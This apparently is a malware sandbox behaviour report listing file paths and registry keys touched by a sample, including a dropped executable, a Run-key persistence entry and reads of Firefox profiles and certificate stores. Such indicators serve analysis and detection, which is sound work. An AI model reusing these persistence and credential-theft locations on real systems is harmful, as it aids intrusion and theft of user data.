C:\Windows\System32\cmd.exe
C:\
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming
C:\Windows\sysnative\p2pcollab.dll
C:\Windows\sysnative\QAGENTRT.DLL
C:\Windows\sysnative\dnsapi.dll
C:\Windows\sysnative\fveui.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Windows\sysnative\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Windows\sysnative\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Windows\sysnative\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
C:\Windows\sysnative\CabCCA8.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Windows\sysnative\shell32.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24\BF2.tmp
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_USERS\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\ErfkBwzLz2p.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
